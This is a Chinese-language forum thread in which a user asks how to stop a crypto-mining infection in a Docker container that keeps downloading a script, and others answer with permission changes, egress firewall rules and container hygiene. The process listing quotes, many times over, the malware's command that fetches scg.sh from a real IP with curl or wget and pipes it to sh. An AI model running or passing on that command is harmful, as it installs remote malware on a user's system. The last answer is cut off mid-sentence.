linux可以禁用curl或者wget吗?

Docker容器里出现挖矿病毒脚本,现在是禁用了病毒来源的IP,但是这个脚本会周期性起下载任务,导致容器异常:

    263 root      20   0    2388    764    696 S   0.0   0.0   0:00.00 /bin/sh -c (curl -s 194.38.20.225/scg.sh||wget -q -O- 194.38.20.225/scg.sh)|sh                                                       
    264 root      20   0   15236   3756   3244 S   0.0   0.2   0:00.00 wget -q -O- 194.38.20.225/scg.sh                                                                                                     
    265 root      20   0    2388    764    696 S   0.0   0.0   0:00.00 sh                                                                                                                                   
    270 root      20   0    2388    700    632 S   0.0   0.0   0:00.00 /bin/sh -c (curl -s 194.38.20.225/scg.sh||wget -q -O- 194.38.20.225/scg.sh)|sh                                                       
    271 root      20   0   15236   3756   3244 S   0.0   0.2   0:00.00 wget -q -O- 194.38.20.225/scg.sh                                                                                                     
    272 root      20   0    2388    760    696 S   0.0   0.0   0:00.00 sh                                                                                                                                   
    276 root      20   0    2388    700    632 S   0.0   0.0   0:00.00 /bin/sh -c (curl -s 194.38.20.225/scg.sh||wget -q -O- 194.38.20.225/scg.sh)|sh                                                       
    277 root      20   0   15236   3800   3288 S   0.0   0.2   0:00.00 wget -q -O- 194.38.20.225/scg.sh                                                                                                     
    278 root      20   0    2388    768    696 S   0.0   0.0   0:00.00 sh                                                                                                                                   
    283 root      20   0    2388    764    696 S   0.0   0.0   0:00.00 /bin/sh -c (curl -s 194.38.20.225/scg.sh||wget -q -O- 194.38.20.225/scg.sh)|sh                                                       
    284 root      20   0   15236   3760   3252 S   0.0   0.2   0:00.00 wget -q -O- 194.38.20.225/scg.sh                                                                                                     
    285 root      20   0    2388    764    696 S   0.0   0.0   0:00.00 sh                                                                                                                                   
    288 root      20   0    2388    760    696 S   0.0   0.0   0:00.00 /bin/sh -c (curl -s 194.38.20.225/scg.sh||wget -q -O- 194.38.20.225/scg.sh)|sh                                                       
    289 root      20   0   15236   3796   3284 S   0.0   0.2   0:00.00 wget -q -O- 194.38.20.225/scg.sh                                                                                                     
    290 root      20   0    2388    764    696 S   0.0   0.0   0:00.00 sh                                                                                                                                   
    294 root      20   0    2388    700    632 S   0.0   0.0   0:00.00 /bin/sh -c (curl -s 194.38.20.225/scg.sh||wget -q -O- 194.38.20.225/scg.sh)|sh                                                       
    295 root      20   0   15236   3756   3244 S   0.0   0.2   0:00.00 wget -q -O- 194.38.20.225/scg.sh                                                                                                     
    296 root      20   0    2388    764    696 S   0.0   0.0   0:00.00 sh                                                                                                                                   
    301 root      20   0    2388    760    696 S   0.0   0.0   0:00.00 /bin/sh -c (curl -s 194.38.20.225/scg.sh||wget -q -O- 194.38.20.225/scg.sh)|sh                                                       
    302 root      20   0   15236   3844   3336 S   0.0   0.2   0:00.00 wget -q -O- 194.38.20.225/scg.sh                                                                                                     
    303 root      20   0    2388    760    696 S   0.0   0.0   0:00.00 sh                                                                                                                                   
    308 root      20   0    2388    764    696 S   0.0   0.0   0:00.00 /bin/sh -c (curl -s 194.38.20.225/scg.sh||wget -q -O- 194.38.20.225/scg.sh)|sh                                                       
    310 root      20   0   15236   3756   3248 S   0.0   0.2   0:00.00 wget -q -O- 194.38.20.225/scg.sh                                                                                                     
    311 root      20   0    2388    764    696 S   0.0   0.0   0:00.00 sh                                                                                                                                   
    313 root      20   0    2388    764    696 S   0.0   0.0   0:00.00 /bin/sh -c (curl -s 194.38.20.225/scg.sh||wget -q -O- 194.38.20.225/scg.sh)|sh                                                       
    315 root      20   0   15236   3832   3320 S   0.0   0.2   0:00.00 wget -q -O- 194.38.20.225/scg.sh                                                                                                     
    316 root      20   0    2388    700    632 S   0.0   0.0   0:00.00 sh                                                                                                                                   
    319 root      20   0    2388    764    696 S   0.0   0.0   0:00.00 /bin/sh -c (curl -s 194.38.20.225/scg.sh||wget -q -O- 194.38.20.225/scg.sh)|sh                                                       
    320 root      20   0    2388     92      0 S   0.0   0.0   0:00.00 /bin/sh -c (curl -s 194.38.20.225/scg.sh||wget -q -O- 194.38.20.225/scg.sh)|sh                                                       
    321 root      20   0    2388    700    632 S   0.0   0.0   0:00.00 sh                                                              

能否直接禁用掉curl呢?

阅读 5k
4 个回答

可以禁用,找到curl或wget的位置,之后chmod 000 curl/get 就可以禁用了。我记得是which curl可以找到这个命令的位置。但最好是通过找到并清除调用curl下载病毒的逻辑并将其删除。也可以通过iptables在流量出方向控制不让其访问下载木马的那个地址。

基础镜像越精简,这些东西应该都没有
image.png

如果你的Docker容器中出现了挖矿病毒脚本,并且已经禁用了病毒来源的IP,但是脚本仍然会周期性地启动下载任务,导致容器异常,你可以采取以下措施:

找出病毒脚本的来源:你需要找出病毒脚本的来源,例如哪个容器或哪个镜像中包含了病毒脚本。你可以使用Docker的日志功能来查看容器的日志,或者使用Docker的命令行工具来查看容器或镜像的详细信息。

删除病毒脚本:一旦你找到了病毒脚本的来源,你需要立即删除它。你可以使用Docker的命令行工具来删除容器或镜像,例如:

docker rm <container_id>
docker rmi <image_id>

请注意,删除容器或镜像可能会导致数据丢失,因此你需要谨慎操作。

更新Docker版本:如果你的Docker版本比较老,可能存在一些安全漏洞,容易被黑客攻击。因此,你需要及时更新Docker版本,以提高安全性。

加强容器安全性:你可以采取一些措施来加强容器的安全性,例如限制容器的网络访问权限、使用安全的镜像、设置容器的资源限制等等。你可以参考Docker的官方文档来了解更多关于容器安全性的信息。

定期检查容器:你需要定期检查容器是否存在安全漏洞或异常行为,例如使用Docker的安全扫描工具来扫描容器中的漏

撰写回答
你尚未登录,登录后可以
  • 和开发者交流问题的细节
  • 关注并接收问题和回答的更新提醒
  • 参与内容的编辑和改进,让解决方法与时俱进
推荐问题
宣传栏